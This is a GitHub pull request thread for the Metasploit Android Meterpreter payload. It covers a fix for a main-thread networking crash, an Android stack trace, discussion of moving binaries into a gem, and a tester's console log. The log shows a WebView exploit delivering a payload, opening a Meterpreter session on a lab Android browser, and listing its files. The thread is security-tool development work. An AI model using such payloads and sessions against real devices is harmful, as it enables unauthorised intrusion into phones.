search

rapid7 / metasploit-javapayload

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
87 stars 82 forks source link

Fix AndroidMeterpreter when running on Main thread #28

Closed timwr closed 9 years ago

timwr commented 9 years ago

This should fix https://github.com/rapid7/metasploit-framework/issues/4920 From adb logcat:

W/System.err( 1423): android.os.NetworkOnMainThreadException
W/System.err( 1423):    at android.os.StrictMode$AndroidBlockGuardPolicy.onNetwork(StrictMode.java:1117)
W/System.err( 1423):    at libcore.io.BlockGuardOs.recvfrom(BlockGuardOs.java:163)
W/System.err( 1423):    at libcore.io.IoBridge.recvfrom(IoBridge.java:513)
W/System.err( 1423):    at java.net.PlainSocketImpl.read(PlainSocketImpl.java:488)
W/System.err( 1423):    at java.net.PlainSocketImpl.access$000(PlainSocketImpl.java:46)
W/System.err( 1423):    at java.net.PlainSocketImpl$PlainSocketInputStream.read(PlainSocketImpl.java:240)
W/System.err( 1423):    at libcore.io.Streams.readFully(Streams.java:81)
W/System.err( 1423):    at java.io.DataInputStream.readInt(DataInputStream.java:124)
W/System.err( 1423):    at com.metasploit.meterpreter.Meterpreter.startExecuting(Unknown Source)
W/System.err( 1423):    at com.metasploit.meterpreter.AndroidMeterpreter$1.run(AndroidMeterpreter.java:67)
W/System.err( 1423):    at android.os.Handler.handleCallback(Handler.java:615)
W/System.err( 1423):    at android.os.Handler.dispatchMessage(Handler.java:92)
W/System.err( 1423):    at android.os.Looper.loop(Looper.java:137)
W/System.err( 1423):    at android.app.ActivityThread.main(ActivityThread.java:4745)
W/System.err( 1423):    at java.lang.reflect.Method.invokeNative(Native Method)
W/System.err( 1423):    at java.lang.reflect.Method.invoke(Method.java:511)
W/System.err( 1423):    at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:786)
W/System.err( 1423):    at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:553)
W/System.err( 1423):    at dalvik.system.NativeStart.main(Native Method)

In some cases the thread that's loading meterpreter can't retrieve the Context object. To work around this we post to the Main/UI thread and try to find the Context again. After https://github.com/rapid7/metasploit-javapayload/pull/23 I forgot to switch the execution back to a background thread.

bcook-r7 commented 9 years ago

Thanks @timwr.

timwr commented 9 years ago

It would be cool to have the binaries for this project out of source control in the main repository, it sucks to add weight for minor changes like this. I'm not sure how well git compresses them. Minor but I also need to make it so (android) binaries don't change each time you rebuild them, I remember @schierlm telling me it's likely only the build time-stamp that changes each time.

OJ commented 9 years ago

Binaries will end up in the gem like the others at some point.

bcook-r7 commented 9 years ago

so, one question that came up while I was testing up a bigger-scope meterpreter gem earlier. meterpreter_bins's methods mostly assume the files you want come from a 'meterpreter' directory, whereas javapayload includes stagers as well. So, it made sense to call the bigger gem something like 'metasploit-payloads' and modify the file search methods to be more general. Does that sound like a good approach?

timwr commented 9 years ago

sounds good to me, thanks @bcook-r7 :)

bcook-r7 commented 9 years ago

Looks good to me. Sorry for the delay:

msf exploit(webview_addjavascriptinterface) > [-] 192.168.56.1     webview_addjavascriptinterface - Target has requested an unknown path: /x/LCsBfh/
[*] 192.168.56.1     webview_addjavascriptinterface - Gathering target information.
[*] 192.168.56.1     webview_addjavascriptinterface - Sending HTML response.
[*] 192.168.56.1     webview_addjavascriptinterface - Serving armle exploit...
[*] Sending stage (44790 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:52887) at 2015-03-22 21:44:59 -0500

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: /data/data/com.android.browser
=======================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  10128  fil   2015-03-22 21:38:33 -0500  WYTfP.dex
40666/rw-rw-rw-   2048   dir   2015-03-22 21:38:07 -0500  app_appcache
40666/rw-rw-rw-   2048   dir   2015-03-22 21:38:07 -0500  app_databases
40666/rw-rw-rw-   2048   dir   2015-03-22 21:38:18 -0500  app_geolocation
40666/rw-rw-rw-   2048   dir   2015-03-22 21:45:03 -0500  app_icons
40666/rw-rw-rw-   2048   dir   2015-03-22 21:44:59 -0500  cache
40666/rw-rw-rw-   2048   dir   2015-03-22 21:44:57 -0500  databases
40444/r--r--r--   2048   dir   2015-03-22 21:37:06 -0500  lib
100666/rw-rw-rw-  10128  fil   2015-03-22 21:44:58 -0500  neKqu.dex
40666/rw-rw-rw-   2048   dir   2015-03-22 21:38:06 -0500  shared_prefs

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.1.2 - Linux 2.6.29-gc497e41 (armv7l)
Meterpreter : java/android